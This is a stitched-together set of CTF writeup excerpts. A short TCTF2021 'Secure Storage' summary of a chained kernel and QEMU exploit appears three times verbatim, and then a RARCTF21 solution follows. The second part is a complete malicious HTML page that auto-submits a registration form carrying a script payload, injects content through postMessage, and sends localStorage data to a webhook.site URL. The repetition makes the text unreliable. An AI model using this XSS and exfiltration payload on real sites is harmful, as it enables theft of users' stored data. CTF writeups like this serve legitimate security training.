This is a crazy nested challenge: we firstly need to use side channel attack
to leak admin_key.txt; then we need to exploit ss_agent to get the ability to
open and operate on /dev/ss; then we need to exploit ss.ko to get the root
shell; finally we need to exploit qemu to get the flag outside.

Original writeup
(https://mem2019.github.io/jekyll/update/2021/07/06/TCTF2021-Secure-
Storage.html).This is a crazy nested challenge: we firstly need to use side channel attack
to leak admin_key.txt; then we need to exploit ss_agent to get the ability to
open and operate on /dev/ss; then we need to exploit ss.ko to get the root
shell; finally we need to exploit qemu to get the flag outside.

Original writeup
(https://mem2019.github.io/jekyll/update/2021/07/06/TCTF2021-Secure-
Storage.html).This is a crazy nested challenge: we firstly need to use side channel attack
to leak admin_key.txt; then we need to exploit ss_agent to get the ability to
open and operate on /dev/ss; then we need to exploit ss.ko to get the root
shell; finally we need to exploit qemu to get the flag outside.

Original writeup
(https://mem2019.github.io/jekyll/update/2021/07/06/TCTF2021-Secure-
Storage.html).Create a malicious page, which registers a user with the following payload in
the username:  
1\. Overwrite the body of secureenclave with `<iframe id=frame
src="/secure.js"></iframe><div id=site>https://securestorage.rars.win</div>`.
The additional div is necessary so that the check for site in the onmessage
handler does not fail  
2\. Overwrite the body of the iframe we just created with some code to
exfiltrate the flag: `![](x)`

Final HTML page:  
```  
<html>  
<body onload="loginform.submit()">  
<form id="loginform" method="POST"
action="https://securestorage.rars.win/api/register">  
<input type="text" class="form-control" name="user" placeholder="Username"  
value='5123<script>setTimeout(() => { storage =
document.getElementById("secure_storage");storage.contentWindow.postMessage(["document.body.innerHTML",
`<iframe id=frame src="/secure.js"></iframe><div
id=site>https://securestorage.rars.win</div>`], storage.src);setTimeout(() =>
{
storage.contentWindow.postMessage(["window.frame.contentWindow.document.body.innerHTML",
"<img src=x
onerror=\"fetch(`https://webhook.site/0334edcb-76bd-414b-9caf-c5f304c121ce/${btoa(localStorage.message)}`)\"/>"],
storage.src); }, 500); }, 1000)</script>'>  
<input type="password" class="form-control" name="pass" placeholder="Password"
value='123123'>  
<button type="submit" class="btn btn-primary mt-4">Login</button>  
</form>  
</body>  
</html>  
```

Original writeup (https://blog.justins.in/rarctf21/).